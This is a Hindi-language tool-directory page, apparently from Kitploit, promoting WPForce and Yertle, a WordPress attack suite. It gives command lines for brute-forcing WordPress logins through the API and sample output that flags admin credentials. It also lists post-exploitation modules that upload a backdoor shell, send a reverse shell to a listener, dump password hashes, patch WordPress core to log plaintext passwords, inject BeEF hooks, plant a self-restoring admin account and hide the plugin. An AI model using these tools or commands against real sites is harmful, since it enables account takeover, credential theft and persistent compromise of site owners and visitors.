Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WPForce — वर्डप्रेस अटैक सूट | Kitploit
उपकरण/GitHubGitHub/n00py/wpforce
पासवर्ड हमलेपेलोड जनरेशनवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंग
GitHubn00py/wpforce

WPForce

वर्डप्रेस अटैक सूट

रिपॉजिटरी देखें
9792235 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

Supported Python versions

WPForce - वर्डप्रेस आक्रमण सूट

परिचय:

WPForce वर्डप्रेस आक्रमण उपकरणों का एक सूट है। वर्तमान में इसमें 2 स्क्रिप्ट शामिल हैं - WPForce, जो API के माध्यम से लॉगिन को ब्रूट फोर्स करता है, और Yertle, जो प्रशासन क्रेडेंशियल्स मिलने के बाद शेल अपलोड करता है। Yertle में कई पोस्ट-एक्सप्लॉइटेशन मॉड्यूल भी शामिल हैं।

अधिक जानकारी के लिए, यहाँ ब्लॉग पोस्ट पर जाएँ: https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/

अन्य भाषाओं में ब्लॉग:

चीनी - www.mottoin.com/100381.html

पुर्तगाली - http://www.100security.com.br/wpforce/

स्पेनिश - http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html

https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/

रूसी - https://hackware.ru/?p=2547

फ़्रेंच - https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/

तुर्की - http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html

विशेषताएँ:

  • API के माध्यम से ब्रूट फोर्स, लॉगिन फ़ॉर्म नहीं, जो सुरक्षा के कुछ रूपों को बायपास करता है
  • स्वचालित रूप से एक इंटरैक्टिव शेल अपलोड कर सकता है
  • एक पूर्ण-सुविधाओं वाला रिवर्स शेल उत्पन्न करने के लिए उपयोग किया जा सकता है
  • वर्डप्रेस पासवर्ड हैश डंप करता है
  • सादा टेक्स्ट पासवर्ड संग्रह के लिए प्रमाणीकरण फ़ंक्शन को बैकडोर कर सकता है
  • सभी पृष्ठों में BeEF हुक इंजेक्ट करता है
  • आवश्यकता होने पर मीटरप्रेटर पर पिवट कर सकता है

स्थापना:

root@kitploit:~
Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/

उपयोग:

root@kitploit:~
python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

   ,-~~-.___.       __        __ ____   _____
  / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
  \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
     ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
    /  \-'~;   ||     |
   /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 =(  _____||________|                 ~n00py~

Username List: usr.txt (3)
Password List: pass.txt (21)
URL: http://www[website].com
--------------------------
[[email protected] : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
--------------------------
--------------------------
[[email protected] : xxxxxxxxxxxx] are valid credentials!
--------------------------
 100% Percent Complete
All correct pairs:
{'[email protected]': 'xxxxxxxxxxxxx', '[email protected]': 'xxxxxxxxxxxxx'}

 -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file name
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist file name
  -u URL, --url URL     URL of target
  -v, --verbose         Verbose output. Show the attemps as they happen.
  -t THREADS, --threads THREADS
                        Determines the number of threads to be used, default
                        is 10
  -a AGENT, --agent AGENT
                        Determines the user-agent
  -d, --debug           This option is used for determining issues with the
                        script.


python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
     _..---.--.    __   __        _   _
   .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
  /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 (____.'.-_\____)    | |  __/ |  | |_| |  __/
  (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
   (_..)--(.._)'--'         ~n00py~
      Post-exploitation Module for Wordpress

Backdoor uploaded!
Upload Directory: ebwhbas
os-shell>



  -h, --help            show this help message and exit
  -i, --interactive     Interactive command shell
  -r, --reverse         Reverse Shell
  -t TARGET, --target TARGET
                        URL of target
  -u USERNAME, --username USERNAME
                        Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -li IP, --ip IP       Listener IP
  -lp PORT, --port PORT
                        Listener Port
  -v, --verbose         Verbose output.
  -e EXISTING, --existing EXISTING
                        Skips uploading a shell, and connects to existing
                        shell


Yertle में वर्तमान में ये मॉड्यूल शामिल हैं:

root@kitploit:~
Core Commands
=============
 
Command                   Description
-------                   -----------
?                         Help menu
beef                      Injects a BeEF hook into website
dbcreds                   Prints the database credentials
exit                      Terminate the session
hashdump                  Dumps all WordPress password hashes
help                      Help menu
keylogger                 Patches WordPress core to log plaintext credentials
keylog                    Displays keylog file
meterpreter               Executes a PHP meterpreter stager to connect to metasploit
persist                   Creates an admin account that will re-add itself
quit                      Terminate the session
shell                     Sends a TCP reverse shell to a netcat listener
stealth                   Hides Yertle from the plugins page
टूल डाउनलोड करें